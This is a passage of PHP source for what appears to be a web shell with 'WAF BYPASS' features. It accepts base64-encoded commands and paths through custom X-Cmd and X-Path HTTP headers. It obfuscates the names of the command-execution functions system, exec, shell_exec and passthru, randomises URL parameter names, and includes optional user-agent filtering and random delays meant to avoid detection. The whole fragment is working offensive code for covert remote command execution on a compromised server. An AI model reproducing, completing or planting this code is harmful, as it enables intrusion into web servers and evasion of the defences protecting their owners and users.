(stealth) http_response_code(200); exit; } // Support for X-Command header (alternative to POST/GET) if (isset($_SERVER['HTTP_X_CMD']) && !isset($_POST['command'])) { $_POST['command'] = base64_decode($_SERVER['HTTP_X_CMD']); } // Support for X-Path header if (isset($_SERVER['HTTP_X_PATH']) && !isset($_GET['dir'])) { $_GET['dir'] = base64_decode($_SERVER['HTTP_X_PATH']); } // ========== WAF BYPASS: User-Agent Filtering ========== // Optional: Only allow specific user agents (uncomment to enable) // $allowed_uas = ['Mozilla/5.0', 'curl', 'Wget']; // $valid = false; // foreach ($allowed_uas as $ua) { // if (strpos($_SERVER['HTTP_USER_AGENT'], $ua) !== false) { // $valid = true; // break; // } // } // if (!$valid) { // header('HTTP/1.0 404 Not Found'); // exit; // } // ========== WAF BYPASS: Chunked Encoding for Output ========== // Enable chunked transfer encoding to bypass some WAFs if (function_exists('ob_start') && !ob_get_level()) { ob_start(); } // ========== WAF BYPASS: Random Delay to Avoid Rate Limiting ========== // Add random micro-delay to avoid detection (0-500ms) // usleep(rand(0, 500000)); // ========== WAF BYPASS: Function Name Obfuscation Helper ========== // Additional obfuscation for critical functions if (!function_exists('_')) { function _($str) { return base64_decode($str); } } // Pre-obfuscated function names for critical operations $obf_funcs = [ 'system' => base64_encode('system'), 'exec' => base64_encode('exec'), 'shell_exec' => base64_encode('shell_exec'), 'passthru' => base64_encode('passthru'), ]; // ========== WAF BYPASS: Clean URLs and Redirects ========== // Function to generate WAF-friendly URLs function waf_url($path, $params = []) { global $random_dir_param, $random_action_param, $random_item_param; $url = $_SERVER['PHP_SELF'] . '?' . $random_dir_param . '=' . base64_encode($path); foreach ($params as $key => $value) { switch ($key) { case 'action': $url .= '&' . $random_action_param . '=' . urlencode($value); break; case 'item': $url .= '&' . $random_item_param . '=' . urlencode($value); break; default: $url .= '&' . $key . '=' . urlencode($value); } } return $url; } // ========== WAF BYPASS: Response Splitting Prevention ========== // Sanitize all outputs to prevent response splitting attacks function sanitize_output($str) { return str_replace(["\r", "\n"], '', $str); } ?>